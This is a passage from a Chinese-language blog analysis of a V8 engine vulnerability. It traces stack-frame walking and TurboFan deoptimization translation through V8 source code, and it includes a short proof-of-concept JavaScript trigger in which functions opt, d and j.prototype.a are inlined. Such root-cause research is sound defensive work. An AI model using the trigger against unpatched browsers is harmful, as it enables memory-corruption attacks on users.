  <span class="n">frame_</span> <span class="o">=</span> <span class="n">SingletonFor</span><span class="p">(</span><span class="n">type</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">state</span><span class="p">);</span>

  <span class="c1">// When we're done iterating over the stack frames, the handler</span>
  <span class="c1">// chain must have been completely unwound. Except for wasm stack-switching:</span>
  <span class="c1">// we stop at the end of the current segment.</span>
<span class="cp">#if V8_ENABLE_WEBASSEMBLY
</span>  <span class="n">DCHECK_IMPLIES</span><span class="p">(</span><span class="n">done</span><span class="p">()</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">FLAG_experimental_wasm_stack_switching</span><span class="p">,</span>
                 <span class="n">handler_</span> <span class="o">==</span> <span class="nb">nullptr</span><span class="p">);</span>
<span class="cp">#else
</span>  <span class="n">DCHECK_IMPLIES</span><span class="p">(</span><span class="n">done</span><span class="p">(),</span> <span class="n">handler_</span> <span class="o">==</span> <span class="nb">nullptr</span><span class="p">);</span>
<span class="cp">#endif
</span><span class="p">}</span>
</code></pre></div></div>

<p>移动操作主要是 <code class="language-plaintext highlighter-rouge">frame_-&gt;GetCallerState(&amp;state)</code> 语句完成，<code class="language-plaintext highlighter-rouge">GetCallerState</code> 是一个虚函数，不同类型的调用栈实现不同，调试时实际调用的是 <code class="language-plaintext highlighter-rouge">StackFrame::GetCallerState</code> 函数</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">StackFrame</span><span class="o">::</span><span class="n">Type</span> <span class="n">StackFrame</span><span class="o">::</span><span class="n">GetCallerState</span><span class="p">(</span><span class="n">State</span><span class="o">*</span> <span class="n">state</span><span class="p">)</span> <span class="k">const</span> <span class="p">{</span>
  <span class="n">ComputeCallerState</span><span class="p">(</span><span class="n">state</span><span class="p">);</span> <span class="c1">// 也是虚函数，实际调用的是 ExitFrame::ComputeCallerState</span>
  <span class="k">return</span> <span class="n">ComputeType</span><span class="p">(</span><span class="n">iterator_</span><span class="p">,</span> <span class="n">state</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="n">ExitFrame</span><span class="o">::</span><span class="n">ComputeCallerState</span><span class="p">(</span><span class="n">State</span><span class="o">*</span> <span class="n">state</span><span class="p">)</span> <span class="k">const</span> <span class="p">{</span>
  <span class="c1">// Set up the caller state.</span>
  <span class="n">state</span><span class="o">-&gt;</span><span class="n">sp</span> <span class="o">=</span> <span class="n">caller_sp</span><span class="p">();</span>
  <span class="n">state</span><span class="o">-&gt;</span><span class="n">fp</span> <span class="o">=</span> <span class="n">Memory</span><span class="o">&lt;</span><span class="n">Address</span><span class="o">&gt;</span><span class="p">(</span><span class="n">fp</span><span class="p">()</span> <span class="o">+</span> <span class="n">ExitFrameConstants</span><span class="o">::</span><span class="n">kCallerFPOffset</span><span class="p">);</span>
  <span class="n">state</span><span class="o">-&gt;</span><span class="n">pc_address</span> <span class="o">=</span> <span class="n">ResolveReturnAddressLocation</span><span class="p">(</span>
      <span class="k">reinterpret_cast</span><span class="o">&lt;</span><span class="n">Address</span><span class="o">*&gt;</span><span class="p">(</span><span class="n">fp</span><span class="p">()</span> <span class="o">+</span> <span class="n">ExitFrameConstants</span><span class="o">::</span><span class="n">kCallerPCOffset</span><span class="p">));</span>
  <span class="n">state</span><span class="o">-&gt;</span><span class="n">callee_pc_address</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">FLAG_enable_embedded_constant_pool</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">state</span><span class="o">-&gt;</span><span class="n">constant_pool_address</span> <span class="o">=</span> <span class="k">reinterpret_cast</span><span class="o">&lt;</span><span class="n">Address</span><span class="o">*&gt;</span><span class="p">(</span>
        <span class="n">fp</span><span class="p">()</span> <span class="o">+</span> <span class="n">ExitFrameConstants</span><span class="o">::</span><span class="n">kConstantPoolOffset</span><span class="p">);</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="n">Address</span> <span class="n">CommonFrame</span><span class="o">::</span><span class="n">GetCallerStackPointer</span><span class="p">()</span> <span class="k">const</span> <span class="p">{</span>
  <span class="k">return</span> <span class="n">fp</span><span class="p">()</span> <span class="o">+</span> <span class="n">CommonFrameConstants</span><span class="o">::</span><span class="n">kCallerSPOffset</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">template</span> <span class="o">&lt;</span><span class="k">class</span> <span class="nc">T</span><span class="p">&gt;</span>
<span class="kr">inline</span> <span class="n">T</span><span class="o">&amp;</span> <span class="n">Memory</span><span class="p">(</span><span class="n">Address</span> <span class="n">addr</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">DCHECK</span><span class="p">(</span><span class="n">IsAligned</span><span class="p">(</span><span class="n">addr</span><span class="p">,</span> <span class="k">alignof</span><span class="p">(</span><span class="n">T</span><span class="p">)));</span>
  <span class="k">return</span> <span class="o">*</span><span class="k">reinterpret_cast</span><span class="o">&lt;</span><span class="n">T</span><span class="o">*&gt;</span><span class="p">(</span><span class="n">addr</span><span class="p">);</span>
<span class="p">}</span>

<span class="k">static</span> <span class="k">constexpr</span> <span class="kt">int</span> <span class="n">kCallerFPOffset</span> <span class="o">=</span> <span class="mi">0</span> <span class="o">*</span> <span class="n">kSystemPointerSize</span><span class="p">;</span>
<span class="k">static</span> <span class="k">constexpr</span> <span class="kt">int</span> <span class="n">kCallerPCOffset</span> <span class="o">=</span> <span class="n">kCallerFPOffset</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">*</span> <span class="n">kFPOnStackSize</span><span class="p">;</span>
<span class="k">static</span> <span class="k">constexpr</span> <span class="kt">int</span> <span class="n">kCallerSPOffset</span> <span class="o">=</span> <span class="n">kCallerPCOffset</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">*</span> <span class="n">kPCOnStackSize</span><span class="p">;</span>

</code></pre></div></div>

<p>可以看到，Advance 操作，就是从栈中读取函数 Prolog 部分保存的上层函数的 ebp，通过 ebp 就可以读取到了上层函数的整个栈帧，跟 CPP 的栈回溯是差不多的。</p>

<p>再回到上面的 <code class="language-plaintext highlighter-rouge">VisitStack</code> 函数分析一下整个的栈回溯过程，可以看到对每层调用栈，调用 <code class="language-plaintext highlighter-rouge">CommonFrame::cast(frame)-&gt;Summarize(&amp;summaries);</code> 收集的此层函数调用的信息。<code class="language-plaintext highlighter-rouge">CommonFrame::Summarize</code> 是个虚函数，对于 Interpreter 栈帧来说实际调用的是 <code class="language-plaintext highlighter-rouge">UnoptimizedFrame::Summarize</code></p>

<pre><code class="language-CPP">void UnoptimizedFrame::Summarize(std::vector&lt;FrameSummary&gt;* functions) const {
  DCHECK(functions-&gt;empty());
  Handle&lt;AbstractCode&gt; abstract_code(AbstractCode::cast(GetBytecodeArray()),
                                     isolate());
  Handle&lt;FixedArray&gt; params = GetParameters();
  FrameSummary::JavaScriptFrameSummary summary(
      isolate(), receiver(), function(), *abstract_code, GetBytecodeOffset(),
      IsConstructor(), *params);
  functions-&gt;push_back(summary);
}

Object CommonFrameWithJSLinkage::receiver() const { return GetParameter(-1); }

JSFunction JavaScriptFrame::function() const {
  return JSFunction::cast(function_slot_object());
}

Handle&lt;FixedArray&gt; CommonFrameWithJSLinkage::GetParameters() const {
  if (V8_LIKELY(!FLAG_detailed_error_stack_trace)) {
    return isolate()-&gt;factory()-&gt;empty_fixed_array();
  }
  int param_count = ComputeParametersCount();
  Handle&lt;FixedArray&gt; parameters =
      isolate()-&gt;factory()-&gt;NewFixedArray(param_count);
  for (int i = 0; i &lt; param_count; i++) {
    parameters-&gt;set(i, GetParameter(i));
  }

  return parameters;
}
</code></pre>

<p>这个函数还相对简单，就是读取了当前栈帧中存储的 receiver, parameters, 字节码偏移量等信息, 存储到 summary。</p>

<p>触发漏洞的栈帧，是 turbofan 编译的代码创建的，对应的 <code class="language-plaintext highlighter-rouge">Summarize</code> 实现是 <code class="language-plaintext highlighter-rouge">OptimizedFrame::Summarize</code></p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="n">OptimizedFrame</span><span class="o">::</span><span class="n">Summarize</span><span class="p">(</span><span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o">&lt;</span><span class="n">FrameSummary</span><span class="o">&gt;*</span> <span class="n">frames</span><span class="p">)</span> <span class="k">const</span> <span class="p">{</span>
  <span class="n">DCHECK</span><span class="p">(</span><span class="n">frames</span><span class="o">-&gt;</span><span class="n">empty</span><span class="p">());</span>
  <span class="n">DCHECK</span><span class="p">(</span><span class="n">is_optimized</span><span class="p">());</span>

  <span class="c1">// Delegate to JS frame in absence of turbofan deoptimization.</span>
  <span class="c1">// TODO(turbofan): Revisit once we support deoptimization across the board.</span>
  <span class="n">Code</span> <span class="n">code</span> <span class="o">=</span> <span class="n">LookupCode</span><span class="p">();</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">code</span><span class="p">.</span><span class="n">kind</span><span class="p">()</span> <span class="o">==</span> <span class="n">CodeKind</span><span class="o">::</span><span class="n">BUILTIN</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">JavaScriptFrame</span><span class="o">::</span><span class="n">Summarize</span><span class="p">(</span><span class="n">frames</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="kt">int</span> <span class="n">deopt_index</span> <span class="o">=</span> <span class="n">SafepointEntry</span><span class="o">::</span><span class="n">kNoDeoptIndex</span><span class="p">;</span>
  <span class="n">DeoptimizationData</span> <span class="k">const</span> <span class="n">data</span> <span class="o">=</span> <span class="n">GetDeoptimizationData</span><span class="p">(</span><span class="o">&amp;</span><span class="n">deopt_index</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">deopt_index</span> <span class="o">==</span> <span class="n">SafepointEntry</span><span class="o">::</span><span class="n">kNoDeoptIndex</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">CHECK</span><span class="p">(</span><span class="n">data</span><span class="p">.</span><span class="n">is_null</span><span class="p">());</span>
    <span class="n">FATAL</span><span class="p">(</span><span class="s">"Missing deoptimization information for OptimizedFrame::Summarize."</span><span class="p">);</span>
  <span class="p">}</span>

  <span class="c1">// Prepare iteration over translation. Note that the below iteration might</span>
  <span class="c1">// materialize objects without storing them back to the Isolate, this will</span>
  <span class="c1">// lead to objects being re-materialized again for each summary.</span>
  <span class="n">TranslatedState</span> <span class="n">translated</span><span class="p">(</span><span class="k">this</span><span class="p">);</span>
  <span class="n">translated</span><span class="p">.</span><span class="n">Prepare</span><span class="p">(</span><span class="n">fp</span><span class="p">());</span>

  <span class="c1">// We create the summary in reverse order because the frames</span>
  <span class="c1">// in the deoptimization translation are ordered bottom-to-top.</span>
  <span class="kt">bool</span> <span class="n">is_constructor</span> <span class="o">=</span> <span class="n">IsConstructor</span><span class="p">();</span>
  <span class="k">for</span> <span class="p">(</span><span class="k">auto</span> <span class="n">it</span> <span class="o">=</span> <span class="n">translated</span><span class="p">.</span><span class="n">begin</span><span class="p">();</span> <span class="n">it</span> <span class="o">!=</span> <span class="n">translated</span><span class="p">.</span><span class="n">end</span><span class="p">();</span> <span class="n">it</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">it</span><span class="o">-&gt;</span><span class="n">kind</span><span class="p">()</span> <span class="o">==</span> <span class="n">TranslatedFrame</span><span class="o">::</span><span class="n">kUnoptimizedFunction</span> <span class="o">||</span>
        <span class="n">it</span><span class="o">-&gt;</span><span class="n">kind</span><span class="p">()</span> <span class="o">==</span> <span class="n">TranslatedFrame</span><span class="o">::</span><span class="n">kJavaScriptBuiltinContinuation</span> <span class="o">||</span>
        <span class="n">it</span><span class="o">-&gt;</span><span class="n">kind</span><span class="p">()</span> <span class="o">==</span>
            <span class="n">TranslatedFrame</span><span class="o">::</span><span class="n">kJavaScriptBuiltinContinuationWithCatch</span><span class="p">)</span> <span class="p">{</span>
      <span class="n">Handle</span><span class="o">&lt;</span><span class="n">SharedFunctionInfo</span><span class="o">&gt;</span> <span class="n">shared_info</span> <span class="o">=</span> <span class="n">it</span><span class="o">-&gt;</span><span class="n">shared_info</span><span class="p">();</span>

      <span class="c1">// The translation commands are ordered and the function is always</span>
      <span class="c1">// at the first position, and the receiver is next.</span>
      <span class="n">TranslatedFrame</span><span class="o">::</span><span class="n">iterator</span> <span class="n">translated_values</span> <span class="o">=</span> <span class="n">it</span><span class="o">-&gt;</span><span class="n">begin</span><span class="p">();</span>

      <span class="c1">// Get or materialize the correct function in the optimized frame.</span>
      <span class="n">Handle</span><span class="o">&lt;</span><span class="n">JSFunction</span><span class="o">&gt;</span> <span class="n">function</span> <span class="o">=</span>
          <span class="n">Handle</span><span class="o">&lt;</span><span class="n">JSFunction</span><span class="o">&gt;::</span><span class="n">cast</span><span class="p">(</span><span class="n">translated_values</span><span class="o">-&gt;</span><span class="n">GetValue</span><span class="p">());</span>
      <span class="n">translated_values</span><span class="o">++</span><span class="p">;</span>

      <span class="c1">// Get or materialize the correct receiver in the optimized frame.</span>
      <span class="n">Handle</span><span class="o">&lt;</span><span class="n">Object</span><span class="o">&gt;</span> <span class="n">receiver</span> <span class="o">=</span> <span class="n">translated_values</span><span class="o">-&gt;</span><span class="n">GetValue</span><span class="p">();</span>
      <span class="n">translated_values</span><span class="o">++</span><span class="p">;</span>

      <span class="c1">// Determine the underlying code object and the position within it from</span>
      <span class="c1">// the translation corresponding to the frame type in question.</span>
      <span class="n">Handle</span><span class="o">&lt;</span><span class="n">AbstractCode</span><span class="o">&gt;</span> <span class="n">abstract_code</span><span class="p">;</span>
      <span class="kt">unsigned</span> <span class="n">code_offset</span><span class="p">;</span>
      <span class="k">if</span> <span class="p">(</span><span class="n">it</span><span class="o">-&gt;</span><span class="n">kind</span><span class="p">()</span> <span class="o">==</span> <span class="n">TranslatedFrame</span><span class="o">::</span><span class="n">kJavaScriptBuiltinContinuation</span> <span class="o">||</span>
          <span class="n">it</span><span class="o">-&gt;</span><span class="n">kind</span><span class="p">()</span> <span class="o">==</span>
              <span class="n">TranslatedFrame</span><span class="o">::</span><span class="n">kJavaScriptBuiltinContinuationWithCatch</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">code_offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="n">abstract_code</span> <span class="o">=</span> <span class="n">ToAbstractCode</span><span class="p">(</span>
            <span class="n">isolate</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">builtins</span><span class="p">()</span><span class="o">-&gt;</span><span class="n">code_handle</span><span class="p">(</span>
                <span class="n">Builtins</span><span class="o">::</span><span class="n">GetBuiltinFromBytecodeOffset</span><span class="p">(</span><span class="n">it</span><span class="o">-&gt;</span><span class="n">bytecode_offset</span><span class="p">())),</span>
            <span class="n">isolate</span><span class="p">());</span>
      <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="n">DCHECK_EQ</span><span class="p">(</span><span class="n">it</span><span class="o">-&gt;</span><span class="n">kind</span><span class="p">(),</span> <span class="n">TranslatedFrame</span><span class="o">::</span><span class="n">kUnoptimizedFunction</span><span class="p">);</span>
        <span class="n">code_offset</span> <span class="o">=</span> <span class="n">it</span><span class="o">-&gt;</span><span class="n">bytecode_offset</span><span class="p">().</span><span class="n">ToInt</span><span class="p">();</span>
        <span class="n">abstract_code</span> <span class="o">=</span>
            <span class="n">handle</span><span class="p">(</span><span class="n">shared_info</span><span class="o">-&gt;</span><span class="n">abstract_code</span><span class="p">(</span><span class="n">isolate</span><span class="p">()),</span> <span class="n">isolate</span><span class="p">());</span>
      <span class="p">}</span>

      <span class="c1">// Append full summary of the encountered JS frame.</span>
      <span class="n">Handle</span><span class="o">&lt;</span><span class="n">FixedArray</span><span class="o">&gt;</span> <span class="n">params</span> <span class="o">=</span> <span class="n">GetParameters</span><span class="p">();</span>
      <span class="n">FrameSummary</span><span class="o">::</span><span class="n">JavaScriptFrameSummary</span> <span class="n">summary</span><span class="p">(</span>
          <span class="n">isolate</span><span class="p">(),</span> <span class="o">*</span><span class="n">receiver</span><span class="p">,</span> <span class="o">*</span><span class="n">function</span><span class="p">,</span> <span class="o">*</span><span class="n">abstract_code</span><span class="p">,</span> <span class="n">code_offset</span><span class="p">,</span>
          <span class="n">is_constructor</span><span class="p">,</span> <span class="o">*</span><span class="n">params</span><span class="p">);</span>
      <span class="n">frames</span><span class="o">-&gt;</span><span class="n">push_back</span><span class="p">(</span><span class="n">summary</span><span class="p">);</span>
      <span class="n">is_constructor</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">it</span><span class="o">-&gt;</span><span class="n">kind</span><span class="p">()</span> <span class="o">==</span> <span class="n">TranslatedFrame</span><span class="o">::</span><span class="n">kConstructStub</span><span class="p">)</span> <span class="p">{</span>
      <span class="c1">// The next encountered JS frame will be marked as a constructor call.</span>
      <span class="n">DCHECK</span><span class="p">(</span><span class="o">!</span><span class="n">is_constructor</span><span class="p">);</span>
      <span class="n">is_constructor</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
    <span class="p">}</span>
  <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>可以看到这个函数的代码量相对大了不少，这是因为 turbofan 生成的代码经过了各种优化，有些函数可能被内联，有些本来会保存在栈上的数据被优化掉了，在栈回溯的时候，就要把这些信息恢复回去。turbofan 在生成优化代码的时候，就已经考虑到了逆优化的场景，把需要的信息都已经存到了 Deoptimization 结构中，这个函数就是在遍历 Deoptimization 数据，恢复栈帧的原貌。</p>

<p>对于 POC 代码来说，通过 turbolizer 查看 tubofan 的 trace 可以发现下面三个函数被内联成一个。</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">function</span> <span class="nf">opt</span><span class="p">(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">,</span><span class="n">c</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span><span class="p">(</span><span class="n">typeof</span> <span class="n">a</span> <span class="o">===</span><span class="err">'</span><span class="n">number</span><span class="err">'</span><span class="p">){</span>
	    <span class="k">if</span><span class="p">(</span><span class="n">a</span><span class="o">&gt;</span><span class="mi">2</span><span class="p">){</span>
		    <span class="k">for</span><span class="p">(</span><span class="n">vari</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="n">i</span><span class="o">&lt;</span><span class="mi">100</span><span class="p">;</span><span class="n">i</span><span class="o">++</span><span class="p">)</span>
		        <span class="p">;</span>
			<span class="k">return</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="n">b</span><span class="p">.</span><span class="n">d</span><span class="p">(</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">,</span><span class="mi">1</span><span class="p">);</span>
		<span class="k">return</span><span class="p">;</span>
	<span class="p">}</span>
			<span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span><span class="n">g</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>

<span class="n">function</span> <span class="n">d</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">use</span> <span class="n">strict</span><span class="p">;</span>
    <span class="n">b</span><span class="p">.</span><span class="n">a</span><span class="p">.</span><span class="n">call</span><span class="p">(</span><span class="n">arguments</span><span class="p">,</span> <span class="n">b</span><span class="p">);</span>
    <span class="k">return</span> <span class="n">arguments</span><span class="p">[</span><span class="n">a</span><span class="p">];</span>
<span class="p">}</span>
	    
<span class="n">j</span><span class="p">.</span><span class="n">prototype</span><span class="p">.</span><span class="n">a</span> <span class="o">=</span> <span class="n">function</span> <span class="p">(</span><span class="n">a</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">a</span><span class="p">.</span><span class="n">b</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">a</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0 C
1 c
2 b
3 a
</code></pre></div></div>

<p>查找 translation_array 的来源，找到 <code class="language-plaintext highlighter-rouge">BuildTranslation</code> 函数</p>

<pre><code class="language-CPP">DeoptimizationExit* CodeGenerator::BuildTranslation(
    Instruction* instr, int pc_offset, size_t frame_state_offset,
    size_t immediate_args_count, OutputFrameStateCombine state_combine) {
  DeoptimizationEntry const&amp; entry =
      GetDeoptimizationEntry(instr, frame_state_offset);
  FrameStateDescriptor* const descriptor = entry.descriptor();
  frame_state_offset++;

  const int update_feedback_count = entry.feedback().IsValid() ? 1 : 0;
  const int translation_index = translations_.BeginTranslation(
      static_cast&lt;int&gt;(descriptor-&gt;GetFrameCount()),
      static_cast&lt;int&gt;(descriptor-&gt;GetJSFrameCount()), update_feedback_count);
  if (entry.feedback().IsValid()) {
    DeoptimizationLiteral literal =
        DeoptimizationLiteral(entry.feedback().vector);
    int literal_id = DefineDeoptimizationLiteral(literal);
    translations_.AddUpdateFeedback(literal_id, entry.feedback().slot.ToInt());
  }
  InstructionOperandIterator iter(instr, frame_state_offset);
  BuildTranslationForFrameStateDescriptor(descriptor, &amp;iter, state_combine);

  DeoptimizationExit* const exit = zone()-&gt;New&lt;DeoptimizationExit&gt;(
      current_source_position_, descriptor-&gt;bailout_id(), translation_index,
      pc_offset, entry.kind(), entry.reason(),
#ifdef DEBUG
      entry.node_id());
#else   // DEBUG
      0);
#endif  // DEBUG
  if (!Deoptimizer::kSupportsFixedDeoptExitSizes) {
    exit-&gt;set_deoptimization_id(next_deoptimization_id_++);
  }
  if (immediate_args_count != 0) {
    auto immediate_args = zone()-&gt;New&lt;ZoneVector&lt;ImmediateOperand*&gt;&gt;(zone());
    InstructionOperandIterator imm_iter(
        instr, frame_state_offset - immediate_args_count - 1);
    for (size_t i = 0; i &lt; immediate_args_count; i++) {
      immediate_args-&gt;emplace_back(ImmediateOperand::cast(imm_iter.Advance()));
    }
    exit-&gt;set_immediate_args(immediate_args);
  }

  deoptimization_exits_.push_back(exit);
  return exit;
}

void CodeGenerator::TranslateStateValueDescriptor(
    StateValueDescriptor* desc, StateValueList* nested,
    InstructionOperandIterator* iter) {
  if (desc-&gt;IsNested()) {
    translations_.BeginCapturedObject(static_cast&lt;int&gt;(nested-&gt;size()));
    for (auto field : *nested) {
      TranslateStateValueDescriptor(field.desc, field.nested, iter);
    }
  } else if (desc-&gt;IsArgumentsElements()) {
    translations_.ArgumentsElements(desc-&gt;arguments_type());
  } else if (desc-&gt;IsArgumentsLength()) {
    translations_.ArgumentsLength();
  } else if (desc-&gt;IsDuplicate()) {
    translations_.DuplicateObject(static_cast&lt;int&gt;(desc-&gt;id()));
  } else if (desc-&gt;IsPlain()) {
    InstructionOperand* op = iter-&gt;Advance();
    AddTranslationForOperand(iter-&gt;instruction(), op, desc-&gt;type());
  } else {
    DCHECK(desc-&gt;IsOptimizedOut());
      if (optimized_out_literal_id_ == -1) {
        optimized_out_literal_id_ = DefineDeoptimizationLiteral(
            DeoptimizationLiteral(isolate()-&gt;factory()-&gt;optimized_out()));
      }
      translations_.StoreLiteral(optimized_out_literal_id_);
  }
}


</code></pre>

<p>函数中用到了两个关键参数，<code class="language-plaintext highlighter-rouge">FrameStateDescriptor* const descriptor = entry.descriptor();</code> 和 <code class="language-plaintext highlighter-rouge">InstructionOperandIterator iter(instr, frame_state_offset);</code>，追踪这两个参数的来源，找到 <code class="language-plaintext highlighter-rouge">InstructionSelector::VisitDeoptimize</code></p>

<pre><code class="language-CPP">void InstructionSelector::VisitDeoptimize(DeoptimizeKind kind,
                                          DeoptimizeReason reason,
                                          NodeId node_id,
                                          FeedbackSource const&amp; feedback,
                                          FrameState frame_state) {
  InstructionOperandVector args(instruction_zone());
  AppendDeoptimizeArguments(&amp;args, kind, reason, node_id, feedback,
                            frame_state);
  Emit(kArchDeoptimize, 0, nullptr, args.size(), &amp;args.front(), 0, nullptr);
}

void InstructionSelector::AppendDeoptimizeArguments(
    InstructionOperandVector* args, DeoptimizeKind kind,
    DeoptimizeReason reason, NodeId node_id, FeedbackSource const&amp; feedback,
    FrameState frame_state) {
  OperandGenerator g(this);
  FrameStateDescriptor* const descriptor = GetFrameStateDescriptor(frame_state);
  DCHECK_NE(DeoptimizeKind::kLazy, kind);
  int const state_id = sequence()-&gt;AddDeoptimizationEntry(
      descriptor, kind, reason, node_id, feedback);
  args-&gt;push_back(g.TempImmediate(state_id));
  StateObjectDeduplicator deduplicator(instruction_zone());
  AddInputsToFrameStateDescriptor(descriptor, frame_state, &amp;g, &amp;deduplicator,
                                  args, FrameStateInputKind::kAny,
                                  instruction_zone());
}

// Returns the number of instruction operands added to inputs.
size_t InstructionSelector::AddInputsToFrameStateDescriptor(
    FrameStateDescriptor* descriptor, FrameState state, OperandGenerator* g,
    StateObjectDeduplicator* deduplicator, InstructionOperandVector* inputs,
    FrameStateInputKind kind, Zone* zone) {
  size_t entries = 0;
  size_t initial_size = inputs-&gt;size();
  USE(initial_size);  // initial_size is only used for debug.

  if (descriptor-&gt;outer_state()) {
    entries += AddInputsToFrameStateDescriptor(
        descriptor-&gt;outer_state(), FrameState{state.outer_frame_state()}, g,
        deduplicator, inputs, kind, zone);
  }

  Node* parameters = state.parameters();
  Node* locals = state.locals();
  Node* stack = state.stack();
  Node* context = state.context();
  Node* function = state.function();

  DCHECK_EQ(descriptor-&gt;parameters_count(),
            StateValuesAccess(parameters).size());
  DCHECK_EQ(descriptor-&gt;locals_count(), StateValuesAccess(locals).size());
  DCHECK_EQ(descriptor-&gt;stack_count(), StateValuesAccess(stack).size());

  StateValueList* values_descriptor = descriptor-&gt;GetStateValueDescriptors();

  DCHECK_EQ(values_descriptor-&gt;size(), 0u);
  values_descriptor-&gt;ReserveSize(descriptor-&gt;GetSize());

  DCHECK_NOT_NULL(function);
  entries += AddOperandToStateValueDescriptor(
      values_descriptor, inputs, g, deduplicator, function,
      MachineType::AnyTagged(), FrameStateInputKind::kStackSlot, zone);

  entries += AddInputsToFrameStateDescriptor(
